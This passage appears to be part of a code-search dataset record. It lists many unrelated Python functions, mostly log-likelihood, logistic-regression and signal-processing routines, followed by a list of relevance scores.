-87.34436035, -87.87495422, -88.34281921,\n -88.74453735, -89.04680634, -89.26436615]) * units.celsius\n __, t_mixed, td_mixed = mixed_parcel(levels, temperatures, dewpoints)\n mixed_parcel_prof = parcel_profile(levels, t_mixed, td_mixed)\n lfc_pressure, lfc_temp = lfc(levels, temperatures, dewpoints, mixed_parcel_prof, td_mixed)\n assert_almost_equal(lfc_pressure, 962.34 * units.mbar, 2)\n assert_almost_equal(lfc_temp, 0.767 * units.degC, 2)", "def Log2T(X):\n data_headers = X.select_dtypes(include=[\"float64\"]).columns\n X[data_headers] = np.log2(X[data_headers])\n return X", "def statePosteriors(log_alpha, log_beta):\n N = log_alpha.shape[0]\n M = log_alpha.shape[1]\n log_gamma = np.zeros((N, M))\n for n in range(N):\n log_gamma[n, 
:] = log_alpha[n, :] + log_beta[n, :] - logsumexp(log_alpha[N-1, :])\n\n return log_gamma", "def loglweave(store):\n code = \"\"\"\n double sum = 0.0, xbeta;\n for(int i=0; i<nobs; i++){\n xbeta = 0.0;\n for(int j=0; j<kreg; j++){\n xbeta += xmat(i,j) * beta(j);\n }\n sum += yvec(i) * xbeta - exp(xbeta);\n }\n return_val = sum;\n \"\"\"\n yvec = store['yvec']\n xmat = store['xmat']\n nobs, kreg = xmat.shape\n beta = store['beta']\n val = weave.inline(code,['yvec','xmat', 'beta','nobs','kreg'],\n compiler='gcc',\n type_converters=converters.blitz\n )\n return val", "def log_filter(stack, sigma):\n stack_cp = stack.astype(np.int16)\n gauss = ndi.filters.gaussian_filter(stack_cp, sigma=sigma)\n log = ndi.filters.laplace(gauss)\n return log", "def beinflumat(x_axis, y_axis, e_eff):\n len_x = len(x_axis)\n len_y = len(y_axis)\n influence_matrix_complete = np.zeros((len_x, len_y, len_x, len_y))\n\n # generate coordinate grids\n a_factor = (x_axis[-1] - x_axis[0]) / (len_x - 1) / 2\n b_factor = (y_axis[-1] - y_axis[0]) / (len_y - 1) / 2\n x_grid = __beinflumatgrid(x_axis)\n y_grid = __beinflumatgrid(y_axis)\n\n # use numexpr to evaluate expressions\n xpa = ne.evaluate('x_grid + a_factor')\n xma = ne.evaluate('x_grid - a_factor')\n ypb = ne.evaluate('y_grid + b_factor')\n ymb = ne.evaluate('y_grid - b_factor')\n\n # calculate complete influence matrix\n for j in range(0, len_y):\n for j_prime in range(0, len_y):\n influence_matrix_complete[:, j, :, j_prime] = \\\n (np.multiply(xpa, np.log(\n np.divide(\n ((ypb[j, j_prime]) +\n np.sqrt(np.multiply((ypb[j, j_prime]),\n (ypb[j, j_prime])) +\n np.multiply(xpa, xpa))),\n ((ymb[j, j_prime]) +\n np.sqrt(np.multiply((ymb[j, j_prime]),\n (ymb[j, j_prime])) +\n np.multiply(xpa, xpa)))))) +\n (ypb[j, j_prime]) * np.log(\n np.divide(\n (xpa +\n np.sqrt(np.multiply((ypb[j, j_prime]),\n (ypb[j, j_prime])) +\n np.multiply(xpa, xpa))),\n (xma +\n np.sqrt(np.multiply((ypb[j, j_prime]),\n (ypb[j, j_prime])) +\n np.multiply(xma, xma))))) +\n np.multiply(xma, np.log(\n np.divide(\n ((ymb[j, j_prime]) +\n np.sqrt(np.multiply((ymb[j, j_prime]),\n (ymb[j, j_prime])) +\n np.multiply(xma, xma))),\n ((ypb[j, j_prime]) +\n np.sqrt(np.multiply((ypb[j, j_prime]),\n (ypb[j, j_prime])) +\n np.multiply(xma, xma)))))) +\n (ymb[j, j_prime]) * np.log(\n np.divide(\n (xma +\n np.sqrt(np.multiply((ymb[j, j_prime]),\n (ymb[j, j_prime])) +\n np.multiply(xma, xma))),\n (xpa +\n np.sqrt(np.multiply((ymb[j, j_prime]),\n (ymb[j, j_prime])) +\n np.multiply(xpa, xpa))))))\n\n return influence_matrix_complete * 1 / e_eff * 2 / pi", "def coefs(logger, model, data=clean_data, target=target):\n\n df = pd.read_csv(data)\n X = df.drop(columns=target)\n coef_df = pd.DataFrame({'Variable': X.columns, 'Coefficient': model.coef_[0]})\\\n .sort_values(by='Coefficient')\n\n coef_path = data_config['outputs']['logreg_coefs']\n coef_df.to_csv(coef_path, index=False)\n print(f'Coefficients saved to {coef_path}')\n\n return", "def front_column_model_p_gain():", "def information_gain(features, attribute_index, targets):\r\n\r\n possible_feature_values = [0,1]\r\n \r\n possible_classifications = [0,1]\r\n \r\n feature = features[:,attribute_index]\r\n \r\n \r\n number_of_samples = len(feature)\r\n \r\n import math\r\n \r\n \r\n #current_entropy = np.sum([-(len(targets[targets==possible_classification])/number_of_samples)*math.log(len(targets[targets==possible_classification])/number_of_samples, 2) for possible_classification in possible_classifications])\r\n \r\n terms_to_be_summed_for_current_entropy = 
[]\r\n \r\n for classification in possible_classifications:\r\n \r\n number_of_elements_with_this_classification = len(targets[targets==classification])\r\n \r\n p_for_this_classification = number_of_elements_with_this_classification/len(targets)\r\n \r\n if p_for_this_classification != 0:\r\n terms_to_be_summed_for_current_entropy.append(-p_for_this_classification*math.log(p_for_this_classification,2))\r\n else:\r\n terms_to_be_summed_for_current_entropy.append(0)\r\n \r\n current_entropy = np.sum(terms_to_be_summed_for_current_entropy)\r\n \r\n \r\n \r\n terms_to_be_summed_for_weighted_entropy = []\r\n \r\n for possible_value in possible_feature_values:\r\n \r\n targets_split_by_feature_value = targets[feature.flatten() == possible_value]\r\n \r\n if len(targets_split_by_feature_value) != 0:\r\n \r\n \r\n weight_of_feature_value = len(targets_split_by_feature_value)/len(targets)\r\n \r\n terms_for_entropy_within_subset = []\r\n \r\n for classification in possible_classifications:\r\n \r\n number_of_subset_elements_with_this_classification = len(targets_split_by_feature_value[targets_split_by_feature_value==classification])\r\n \r\n p_in_subset_for_this_classification = number_of_subset_elements_with_this_classification/len(targets_split_by_feature_value)\r\n \r\n if p_in_subset_for_this_classification != 0:\r\n terms_for_entropy_within_subset.append(-p_in_subset_for_this_classification*math.log(p_in_subset_for_this_classification,2))\r\n else:\r\n terms_for_entropy_within_subset.append(0)\r\n \r\n entropy_within_subset = np.sum(terms_for_entropy_within_subset)\r\n \r\n terms_to_be_summed_for_weighted_entropy.append(weight_of_feature_value*entropy_within_subset)\r\n \r\n weighted_entropy = np.sum(terms_to_be_summed_for_weighted_entropy)\r\n \r\n \r\n #current_entropy = np.sum(terms_to_be_summed_for_current_entropy)\r\n \r\n #weighted_entropy = np.sum([(len(feature[feature==possible_value])/number_of_samples)*(len(targets[feature==possible_value][targets[feature==possible_value]==possible_classification])/len(targets[feature==possible_value]))*math.log((len(targets[feature==possible_value][targets[feature==possible_value]==possible_classification])/len(targets[feature==possible_value])), 2) for possible_classification in possible_classifications for possible_value in possible_feature_values])\r\n\r\n information_gain = current_entropy - weighted_entropy \r\n \r\n return information_gain", "def load(self, old_log):\n all_log = tflog2pandas(old_log)\n\n for _, row in all_log.iterrows():\n tag, value, step = row\n self.writer.add_scalar(tag,value,step)", "def log_mae(labels, predictions):\n\n result = abs(labels - predictions)\n result = reduce_mean(result)\n result = log(result)\n\n return result", "def calc_tf_log(doc):\r\n tf = calc_tf(doc)\r\n max_tf = tf[max(tf, key=tf.get)]\r\n tf_log = {}\r\n for key, val in tf.items():\r\n tf_log[key] = (1 + math.log(val)) / (1 + math.log(max_tf))\r\n return tf_log", "def analyse_loglike(test_data, mods):\r\n l1 = list(map(lambda x: x + ' NB', mods.names))\r\n l1.extend(list(map(lambda x: x + ' ZI', mods.names)))\r\n l1.extend(list(map(lambda x: x + ' P', mods.names)))\r\n loglikeNB = np.array(mods.compute_log_likelihood(test_data, 'NB'))\r\n loglikeZI = np.array(mods.compute_log_likelihood(test_data, 'ZI'))\r\n loglikeP = np.array(mods.compute_log_likelihood(test_data, 'P'))\r\n # loglikeG = np.array(mods.compute_log_likelihood_gaussian(test_data))\r\n # loglikegeo = np.array(mods.compute_log_likelihood_geom(test_data))\r\n LL = 
np.zeros((loglikeNB.shape[0] * 3, loglikeNB.shape[1]))\r\n LL[:loglikeNB.shape[0], :] = loglikeNB\r\n LL[loglikeNB.shape[0]:2 * loglikeNB.shape[0], :] = loglikeZI\r\n LL[2 * loglikeNB.shape[0]:3 * loglikeNB.shape[0], :] = loglikeP\r\n # LL[3 * loglikeNB.shape[0]:4 * loglikeNB.shape[0], :] = loglikeG\r\n # LL[4 * llzi.shape[0]:, :] = np.array(mods.loglikegeo)\r\n print('mean per model', list(zip(np.ma.masked_invalid(LL).sum(axis=1), map(lambda x: x.mod.name, mods.models))))\r\n print('mean per distrib')\r\n print(np.ma.masked_invalid(LL[:loglikeNB.shape[0], :]).mean())\r\n print(np.ma.masked_invalid(LL[loglikeNB.shape[0]:loglikeNB.shape[0] * 2, :]).mean())\r\n print(np.ma.masked_invalid(LL[loglikeNB.shape[0] * 2:loglikeNB.shape[0] * 3, :]).mean())\r\n # print(np.nanmean(LL[1-np.isinf(LL)], axis=1))\r\n # print(np.nanmean(LL[LL != np.inf],axis=1))\r\n LL[np.isnan(LL)] = 0\r\n LL[np.isinf(LL)] = 0\r\n LL[LL == 0] = -np.inf\r\n r = np.argmax(LL, axis=0)\r\n # LL /= mx\r\n print('mean_best', np.mean(np.ma.masked_invalid(LL[r, range(LL.shape[1])])))\r\n mx = np.max(LL, axis=0)\r\n LL = LL / mx\r\n means = test_data.get_miniOD(None)[test_data.get_stations_col(None)].mean(axis=0).to_numpy()\r\n # for i in np.unique(r):\r\n # print(means[r == i].max())\r\n print('mean NB', means[r < loglikeNB.shape[0]].mean())\r\n print('mean ZI', means[(r < 2 * loglikeNB.shape[0]) * (r > loglikeNB.shape[0])].mean())\r\n print('mean poisson', means[(r < 3 * loglikeNB.shape[0]) * (r > 2 * loglikeNB.shape[0])].mean())\r\n # print('mean ga', means[(r < 4 * llzi.shape[0]) * (r > 3 * llzi.shape[0])].mean())\r\n # print('mean Gaussian', means[r > 3 * loglikeNB.shape[0]].mean())\r\n print('model name, mean trips per model, LL/maxLL, N inf')\r\n for i in range(LL.shape[0]):\r\n print(l1[i], means[r == i].mean(), np.mean(np.ma.masked_invalid(LL[i, :])), np.sum(np.isinf(LL[i, :])))\r\n print(np.ma.corrcoef(np.ma.masked_invalid(LL[i, :]), means[:LL.shape[1]])[1, 0])\r\n plt.hist(r, bins=np.arange(-0.5, 3 * len(mods.names) + 1, 1))\r\n\r\n # l1.extend(list(map(lambda x: x + ' geo', mods.names)))\r\n # l1.extend(list(map(lambda x: x + ' G', mods.names)))\r\n plt.xticks(range(len(l1)), l1, rotation='vertical')\r\n plt.show()\r\n\r\n for m in mods.loglike:\r\n print(m)\r\n print(m[np.logical_not(np.isinf(m))].mean())", "def _loglike(self, y, f):\n bincoef = tf.lgamma(self.n + 1) - tf.lgamma(y + 1) \\\n - tf.lgamma(self.n - y + 1)\n ll = bincoef + y * tf.log(pos(f)) + (self.n - y) * tf.log(pos(1 - f))\n return ll", "def loglloop(store):\n suml=0.0\n for i in xrange(store['yvec'].shape[0]):\n xbeta=dot(store['xmat'][i,:],store['beta'])\n suml=suml+store['yvec'][i] * xbeta - exp(xbeta)\n return suml", "def compute_gradients(self, logits, target):\n\n target_length = target.shape[0]\n num_time_steps = logits.shape[0]\n\n\t\t######################\n\t\t### YOUR CODE HERE ###\n\t\t######################\n\n # expand labels by inserting a blank between each pair\n normalized_logits = softmax(logits)\n blank_label = normalized_logits.shape[1] - 1\n l = add_blanks(target, blank_label)\n target_length = l.shape[0]\n\n alpha = self.compute_forward_variables(normalized_logits, target) \n beta = self.compute_backward_variables(normalized_logits, target)\n\n # rescale\n alpha = alpha / np.sum(alpha, axis=0)\n beta = beta / np.sum(beta, axis=0)\n alphabeta = alpha * beta\n print \"alpha\"\n print alpha\n\n # compute zt\n z = Counter()\n for t in xrange(num_time_steps):\n for s, k in enumerate(l):\n z[t] += alphabeta[s, t] / normalized_logits[t, 
k]\n \n # normalized_logits is time steps t by labels k\n # alpha is 2 * target_length - 1 by time steps\n lab_zk = np.zeros_like(normalized_logits)\n for s, k in enumerate(l):\n for t in xrange(num_time_steps):\n lab_zk[t, k] += alphabeta[s, t]\n\n grad = normalized_logits\n for k in xrange(target.shape[0]):\n for t in xrange(num_time_steps):\n ytk = normalized_logits[t, k]\n constant = 1.0 / (ytk * z[t])\n grad[t, k] = ytk - constant * lab_zk[t, k]\n \n return grad", "def extrapolate_fwds(h, ufr, llfr, alpha=0.10):\n fwd_fsp_fsp_plus_h = np.log(1 + ufr) + (llfr - np.log(1 + ufr)) * big_b(h, alpha)\n return fwd_fsp_fsp_plus_h", "def logits_on_features(self, h, batch):\n batch = batch.to(h.device)\n # Extract features with the model\n features = h.view(batch.size, -1)\n # Log loss\n logits = self.head(features)\n return logits", "def compute_loglike(self, tools: ModelingTools) -> float:\n return -1.5", "def estimate_logreg(x,y,N_its,learning_rate=1e-4,regularizer=1e-2,lazy_reg=True):\n weights = defaultdict(float)\n weight_hist = [] #keep a history of the weights after each iteration\n all_labels = set(y)\n \n # this block is for lazy regularization\n ratereg = learning_rate * regularizer\n def regularize(base_feats):\n for base_feat in base_feats:\n for label in all_labels:\n #print \"regularizing\",(label,base_feat),t,last_update[base_feat],(1. - ratereg) ** (t-last_update[base_feat])\n weights[(label,base_feat)] *= (1. - ratereg) ** (t-last_update[base_feat])\n last_update[base_feat] = t\n\n t = 0\n last_update = defaultdict(int)\n\n eeta = learning_rate\n\n for it in xrange(N_its):\n\n for i,(x_i,y_i) in enumerate(zip(x,y)): #keep\n t += 1\n\n # regularization\n if lazy_reg: # lazy regularization is essential for speed\n regularize(x_i) # only regularize features in this instance\n if not lazy_reg: # for testing/explanatory purposes only\n for feat,weight in weights.iteritems():\n if feat[1] is not OFFSET: # usually don't regularize offset\n weights[feat] -= ratereg * weight\n\n p_y = compute_py(x_i,weights,all_labels) #hint\n\n term2 = make_feature_vector(x_i, y_i)\n\n for key in term2.keys():\n weights[key] = weights[key] + (term2[key]*eeta)\n\n for label in all_labels:\n temp = make_feature_vector(x_i, label)\n for key in temp.keys():\n weights[key] = weights[key] - (temp[key]*eeta*p_y[label])\n\n\n print it,\n weight_hist.append(weights.copy()) \n\n # if lazy, let regularizer catch up\n if lazy_reg:\n # iterate over base features\n regularize(list(set([f[1] for f in weights.keys() if f[1] is not OFFSET])))\n\n return weights,weight_hist", "def log_trans(data, test=False):\n logs = ['Administrative', 'Administrative_Duration', 'Informational',\n 'Informational_Duration', 'ProductRelated',\n 'ProductRelated_Duration', 'BounceRates', 'ExitRates',\n 'PageValues']\n if test:\n data_test = data.loc[data['Train'] == 0]\n data = data.loc[data['Train'] == 1]\n\n for col in logs:\n zero_val = float((min(i for i in list(data[col]) if i > 0))/2)\n data[col] = data[col].apply(lambda x: zero_val if x == 0 else x)\n data[col] = data[col].apply(lambda x: np.log(x))\n if test:\n data_test[col] = data_test[col].apply(lambda x:\n zero_val\n if x == 0 else x)\n data_test[col] = data_test[col].apply(lambda x: np.log(x))\n if test:\n data = pd.concat([data, data_test])\n return data", "def logistic(weights, data, targets, hyperparameters):\n \n t = np.transpose(np.repeat(np.reshape(weights[:-1], (len(weights)-1, 1)), len(data), axis = 1))\n f_e = data * t\n z_sums = np.sum(f_e, axis=1)\n y = 
sigmoid(z_sums +weights[-1])\n f = np.sum(np.log(1 + np.exp(-z_sums - weights[-1])) + (1 - np.transpose(targets)) * (z_sums + weights[-1]))\n df = np.sum(data * np.transpose(((-np.exp(-z_sums - weights[-1]) / (1 + np.exp(-z_sums - weights[-1]))) + (1 - np.transpose(targets)))), axis = 0)\n df = np.append(df, np.sum(np.transpose(((-np.exp(-z_sums - weights[-1]) / (1 + np.exp(-z_sums - weights[-1]))) + (1 - np.transpose(targets)))), axis = 0))\n df = np.reshape(df, ((len(df), 1)))\n\n return f, df, np.reshape(y, (len(y), 1))", "def _backward(n_samples, n_components, log_startprob,\n log_transmat, framelogprob, mask):\n \n bwdlattice = torch.zeros_like(framelogprob)\n # last row is already zeros, so omit the zero setting step\n for t in range(n_samples - 2, -1, -1):\n for i in range(n_components):\n work_buffer = log_transmat[i,:] + framelogprob[:,t + 1, :] + bwdlattice[:,t+1, :]\n bwdlattice[:, t, i] = torch.logsumexp(work_buffer, dim=-1) * mask[:, t+1].type(framelogprob.dtype)\n return bwdlattice", "def get_logits(image):\n x = image\n for filters in (32, 64):\n x = tf.layers.conv2d(x, filters, 3)\n x = tf.nn.relu(x)\n x = tf.layers.max_pooling2d(x, 3, 2)\n x = tf.reduce_mean(x, axis=(1, 2))\n logits = tf.layers.dense(x, 10)\n return logits", "def log_likelihood(self, data, reward_model, bias_params):", "def loglnumpy(store):\n xbeta = dot(store['xmat'], store['beta'])\n lamb = exp(xbeta)\n return sum(store['yvec'] * xbeta - lamb)", "def my_loglike(theta, x, data, sigma):\n\n model = my_model(theta, x)\n\n return -0.5*len(x)*np.log(2*math.pi*sigma**2) - (0.5/sigma**2) * np.sum((data-model)**2)", "def gradient_ascent(f, df, theta_init, step_size, max_iter):\n\n fs = []\n xs = []\n thetas = theta_init\n for i in range(max_iter): #for each data example\n fs.append(f(thetas))\n\n temp = step_size*df(thetas)\n thetas = step_size*df(thetas) #modify that feature by using the derivative of log likelihood\n xs.append(thetas.flatten())\n if i % 10 == 0:\n print(i, thetas)\n\n return thetas, fs, xs", "def logm(self, x):\n\n if K.backend() == 'theano':\n # construct theano tensor operation\n from theano.tensor.nlinalg import svd, diag\n from theano.tensor.elemwise import Elemwise\n from theano.scalar import log\n import theano.tensor as T\n # This implementation would be extremely slow. 
but efficient?\n u, d, v = svd(x)\n d += self.eps\n inner = diag(T.log(d))\n res = T.dot(u, T.dot(inner, v))\n return res\n else:\n from kyu.tensorflow.ops.svd_gradients import batch_matrix_log\n return batch_matrix_log(x, self.eps)", "def calcfeat_delta_delta(signal, samplerate=16000, win_length=0.025, win_step=0.01, filters_num=26, NFFT=512,\n\t\t\t\t\t\t low_freq=0, high_freq=None, pre_emphasis_coeff=0.97, cep_lifter=22, appendEnergy=True,\n\t\t\t\t\t\t mode='mfcc', feature_len=13):\n\tfilters_num = 2 * feature_len\n\tfeat = calcMFCC(signal, samplerate, win_length, win_step, feature_len, filters_num, NFFT, low_freq, high_freq,\n\t\t\t\t\tpre_emphasis_coeff, cep_lifter, appendEnergy, mode=mode) # 首先获取13个一般MFCC系数\n\tfeat_delta = delta(feat)\n\tfeat_delta_delta = delta(feat_delta)\n\n\tresult = numpy.concatenate((feat, feat_delta, feat_delta_delta), axis=1)\n\treturn result", "def _forward(n_samples, n_components, log_startprob,\n log_transmat, batch_framelogprob, mask):\n\n batch_size = batch_framelogprob.shape[0]\n fwdlattice = torch.zeros_like(batch_framelogprob)\n \n fwdlattice[:, 0, :] = log_startprob + batch_framelogprob[:,0, :]\n for t in range(1, n_samples):\n for j in range(n_components):\n work_buffer = fwdlattice[:, t-1, :] + log_transmat[:, j]\n # fwdlattice[:,t, j] = torch.logsumexp(work_buffer, dim=-1) + \\\n # framelogprob[:,t, j] \n \n fwdlattice[:,t, j] = torch.logsumexp(work_buffer, dim=-1) * \\\n mask[:, t].type(batch_framelogprob.dtype) + batch_framelogprob[:,t, j] \n\n # need to find the idx for last sample of each sequence by mask.sum(dim=-1)-1, fwdlattice[:, -1, :] would give the padded zeros\n batch_logprob = torch.logsumexp(fwdlattice[list(range(batch_size)), mask.sum(dim=-1)-1, :], dim=-1)\n return batch_logprob, fwdlattice", "def M(f):\n return 1127 * numpy.log(1 + f/700.0)", "def loglike(self, params):\n\n if type(params) is not MixedLMParams:\n params = MixedLMParams.from_packed(params, self.k_fe,\n self.use_sqrt)\n\n fe_params = params.get_fe_params()\n cov_re = params.get_cov_re()\n try:\n cov_re_inv = np.linalg.inv(cov_re)\n except np.linalg.LinAlgError:\n cov_re_inv = None\n _, cov_re_logdet = np.linalg.slogdet(cov_re)\n\n # The residuals\n expval = np.dot(self.exog, fe_params)\n resid_all = self.endog - expval\n\n likeval = 0.\n\n # Handle the covariance penalty\n if self.cov_pen is not None:\n likeval -= self.cov_pen.func(cov_re, cov_re_inv)\n\n # Handle the fixed effects penalty\n if self.fe_pen is not None:\n likeval -= self.fe_pen.func(fe_params)\n\n xvx, qf = 0., 0.\n for k, lab in enumerate(self.group_labels):\n\n exog = self.exog_li[k]\n ex_r = self.exog_re_li[k]\n ex2_r = self.exog_re2_li[k]\n resid = resid_all[self.row_indices[lab]]\n\n # Part 1 of the log likelihood (for both ML and REML)\n ld = _smw_logdet(1., ex_r, ex2_r, cov_re, cov_re_inv,\n cov_re_logdet)\n likeval -= ld / 2.\n\n # Part 2 of the log likelihood (for both ML and REML)\n u = _smw_solve(1., ex_r, ex2_r, cov_re, cov_re_inv, resid)\n qf += np.dot(resid, u)\n\n # Adjustment for REML\n if self.reml:\n mat = _smw_solve(1., ex_r, ex2_r, cov_re, cov_re_inv,\n exog)\n xvx += np.dot(exog.T, mat)\n\n if self.reml:\n likeval -= (self.n_totobs - self.k_fe) * np.log(qf) / 2.\n _,ld = np.linalg.slogdet(xvx)\n likeval -= ld / 2.\n likeval -= (self.n_totobs - self.k_fe) * np.log(2 * np.pi) / 2.\n likeval += ((self.n_totobs - self.k_fe) *\n np.log(self.n_totobs - self.k_fe) / 2.)\n likeval -= (self.n_totobs - self.k_fe) / 2.\n else:\n likeval -= self.n_totobs * np.log(qf) / 2.\n likeval -= 
self.n_totobs * np.log(2 * np.pi) / 2.\n likeval += self.n_totobs * np.log(self.n_totobs) / 2.\n likeval -= self.n_totobs / 2.\n\n return likeval", "def f_log_encoding(x, in_reflection=False):\n a = 0.555556\n b = 0.009468\n c = 0.344676\n d = 0.790453\n e = 8.735631\n f = 0.092864\n cut1 = 0.00089\n\n if not in_reflection:\n x = x * 0.9\n\n y = np.where(x < cut1,\n e * x + f,\n c * np.log10(a * x + b) + d)\n\n return y", "def log_det_Jxz(self):\n #return self.log_det_xz.output\n log_det_Jxzs = []\n for l in self.layers:\n if hasattr(l, 'log_det_Jxz'):\n log_det_Jxzs.append(l.log_det_Jxz)\n if len(log_det_Jxzs) == 0:\n return tf.ones((self.output_z.shape[0],))\n if len(log_det_Jxzs) == 1:\n return log_det_Jxzs[0]\n return tf.reduce_sum(log_det_Jxzs, axis=0, keepdims=False)", "def test_l2_metric_log_vectorization(\n self, l2_metric_s2, times, landmarks_a, landmarks_b, landmarks_c\n ):\n landmarks_ab = l2_metric_s2.geodesic(landmarks_a, landmarks_b)\n landmarks_bc = l2_metric_s2.geodesic(landmarks_b, landmarks_c)\n landmarks_ab = landmarks_ab(times)\n landmarks_bc = landmarks_bc(times)\n\n tangent_vecs = l2_metric_s2.log(point=landmarks_bc, base_point=landmarks_ab)\n\n result = tangent_vecs\n self.assertAllClose(gs.shape(result), gs.shape(landmarks_ab))", "def kullbackLeibler(mu, log_sigma):\n # (tf.Tensor, tf.Tensor) -> tf.Tensor\n # = -0.5 * (1 + log(sigma**2) - mu**2 - sigma**2)\n return -0.5 * tf.reduce_sum(1 + 2 * log_sigma - mu**2 - tf.exp(2 * log_sigma), 1)", "def log_shift(data):\n result = [np.log(1 + np.abs(d.copy())) for d in data]\n return result", "def log_boltzmann_dist(Q, temperature):\n return nn.LogSoftmax(dim=0)(Q/temperature)", "def removeFactors(self,flist, isLog=False):\n # Currently: just divide out factors (add inverse factors) -- can't check if factor present? 
(minimal)\n # TODO: set entries to zero, then call self.L.eliminate_zeros()\n row = np.zeros(2*len(flist),dtype=int)-1; col=row.copy(); data=np.zeros(2*len(flist));\n for k,f in enumerate(flist):\n if not isLog: \n if np.any(f.t==0): f = f+1e-30; # TODO: log nonzero tol\n f = f.log()\n if f.nvar == 1:\n Xi = f.vars[0]\n self.h[Xi] -= .5*(f[1]-f[0])\n self.c -= .5*(f[1]+f[0])\n else:\n Xi,Xj = f.vars[0],f.vars[1]\n row[2*k],col[2*k],data[2*k] = int(Xi),int(Xj), .25*(f[1,1]+f[0,0]-f[0,1]-f[1,0])\n row[2*k+1],col[2*k+1],data[2*k+1] = col[2*k],row[2*k],data[2*k] \n #L[Xi,Xj] += .25*(f[1,1]+f[0,0]-f[0,1]-f[1,0])\n self.h[Xi] -= .5*(f[1,0]-f[0,0])+data[2*k] #L[Xi,Xj]\n self.h[Xj] -= .5*(f[0,1]-f[0,0])+data[2*k] #L[Xi,Xj]\n self.c -= .25*(f[1,1]+f[1,0]+f[0,1]+f[0,0])\n self.L -= csr((data[row>=0],(row[row>=0],col[row>=0])),shape=(self.nvar,self.nvar)); \n #raise NotImplementedError();", "def started_log(X,params):\n \n offset = params['offset']\n if not is_number(params['offset']):\n offset=1.\n X = np.log(X+offset)\n return X", "def binlogreg_train(X, Y_):\n N = X.shape[0]\n\n w = np.random.randn(X.shape[1], 1) # D x 1\n b = np.random.randn(N, 1) # N x 1\n\n for i in range(PARAM_NITER+1):\n # klasifikacijski rezultati\n scores = np.dot(X, w) + b # N x 1\n\n # vjerojatnosti razreda c_1\n probs = sigmoid(scores, y=1) # N x 1\n\n # gubitak\n loss = -1 * float(np.dot(Y_.T, np.log(probs))) # scalar\n\n # dijagnostički ispis\n if i % 10 == 0:\n print(\"iteration {}: loss {}\".format(i, loss))\n\n # if i % 1000 == 0:\n # Y = np.around(probs, decimals=0)\n # decfun = binlogreg_decfun(w, b)\n # bbox = (np.min(X, axis=0), np.max(X, axis=0))\n # data.graph_surface(decfun, bbox, offset=0.5)\n # data.graph_data(X, Y_, Y)\n\n # derivacije gubitka po klasifikacijskom rezultatu\n dL_dscores = np.subtract(probs, Y_) # N x 1\n\n # gradijenti parametara\n grad_w = np.divide(np.dot(X.T, dL_dscores), N) # D x 1\n grad_b = np.divide(np.sum(dL_dscores), N) # 1 x 1\n\n # poboljšani parametri\n w += -PARAM_DELTA * grad_w\n b += -PARAM_DELTA * grad_b\n\n return w, b", "def calculate_log_perplexity(self, output, flat_labels): #completed, expensive, should be compiled\n return -np.sum(np.log2(np.clip(output, a_min=1E-12, a_max=1.0))[np.arange(flat_labels.shape[0]), flat_labels[:,1]])", "def _object_func_marginals_coarse_log(log_params, *args, **kwargs):\n return _object_func_marginals_coarse(numpy.exp(log_params), *args, **kwargs)", "def ComputeLogGradientTerm(self, *args):\n return _ITKCostFunctionsPython.itkShapePriorMAPCostFunctionBaseIF2F_ComputeLogGradientTerm(self, *args)", "def nloglikeobs(self, params):\n lambda_ = params[0]\n\n ll_output = self._LL(self.endog, rate=lambda_)\n\n return -np.log(ll_output)" ]
[ "0.6378001", "0.6166156", "0.6106605", "0.5986836", "0.59717876", "0.59704345", "0.59436226", "0.59277886", "0.59004104", "0.5880232", "0.58595026", "0.5850303", "0.5847764", "0.5805098", "0.5797871", "0.5773712", "0.57430214", "0.5730535", "0.5728411", "0.5695498", "0.5692875", "0.56894165", "0.56871295", "0.5641088", "0.5625169", "0.56205744", "0.5615457", "0.5612503", "0.5609048", "0.55979997", "0.55879", "0.5563873", "0.55304533", "0.5519584", "0.55065334", "0.55019194", "0.54908335", "0.54866207", "0.5459678", "0.54480726", "0.54426587", "0.5432098", "0.54161847", "0.5404022", "0.5396066", "0.53948337", "0.53847915", "0.53799236", "0.53707767", "0.53654844", "0.53590035", "0.5353767", "0.5335818", "0.5331275", "0.53304774", "0.53268474", "0.532503", "0.5316599", "0.5315532", "0.5313041", "0.53116375", "0.53033835", "0.52984333", "0.52945787", "0.528327", "0.5282651", "0.52821815", "0.5281049", "0.5272419", "0.52698946", "0.52677405", "0.5267534", "0.52663547", "0.5265353", "0.52507097", "0.52447474", "0.5242855", "0.52366304", "0.52347183", "0.5222501", "0.5215998", "0.52086055", "0.5208299", "0.5206244", "0.5205503", "0.5203742", "0.51976013", "0.5195578", "0.5192546", "0.51924056", "0.5188186", "0.5187208", "0.5187134", "0.51859534", "0.51841575", "0.5173836", "0.51732194", "0.51731825", "0.5170564", "0.51699156", "0.5167506" ]
0.0
-1
Create the game, SpaceInvaders. Train or test it.
def __init__ (self,gameName,total_episodes=50,train_or_test=2): #additional param:- doLoadNetwork=True self.createGame(gameName) ### Training Hyperparameters self.TOT_EPISODES = total_episodes #no. of episodes/epochs self.MAX_STEPS = 50000 #max steps taken every episode/epoch ### Preprocessing Hyperparameters self.stack_size = 4 #stacking 3 frames at once. self.stacked_frames = deque([np.zeros((84,84), dtype=np.int) for i in range(self.stack_size)], maxlen=4) ### Model self.dqn = DDQN(self.action_space) self.path = "saved.h5" # train agent or simulate the game. if train_or_test == 1: self.trainAgent() elif train_or_test == 2: #load network before simulating. self.load_network() self.simulate()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, game_name, skip_actions=4, num_frames=4, w=84, h=84):\n self.env = gym.make(game_name)\n self.num_frames = num_frames\n self.skip_actions = skip_actions\n self.w = w\n self.h = h\n\n if game_name == 'SpaceInvaders-v0':\n self.action_space=[1,2,3]\n\n self.action_size = len(self.action_space)\n self.state = None\n self.game_name = game_name", "def create_game(self):\n\n\t\tself.player_model.grid = []\n\t\tself.player_model.available_cells = []\n\n\t\tfor i in range(9):\n\t\t\tc = Cell(i, None)\n\t\t\tself.player_model.grid.append(c)\n\t\t\tself.player_model.available_cells.append(c)\n\n\t\tself.player_frame.setup_game(self.player_model.current_player.name)", "def _create_games(self):\n\n ''''''", "def start_game(self):\n\n\t\tpass", "def setup_game(self):", "def make_game(self):\n game = Game(self.data['gamename'])\n self.game = game\n return game", "def game_start():\n herolist = Hero_List(hots_db)\n heroclasses = []\n for item in herolist:\n heroclasses.append(Item(item, 'hero'))\n curgame = Game(Team('home'), Team('enemy'), Team('hero_pool', heroclasses), '')\n return curgame", "def create(game):\r\n ## Create Garbage\r\n game.garbage = deque([])\r\n\r\n ## Create Stars\r\n game.create_stars()\r\n\r\n ## Create Millenium Falcon\r\n game.falcons = MilleniumFalcon.init(game)\r\n game.millenium_falcon = 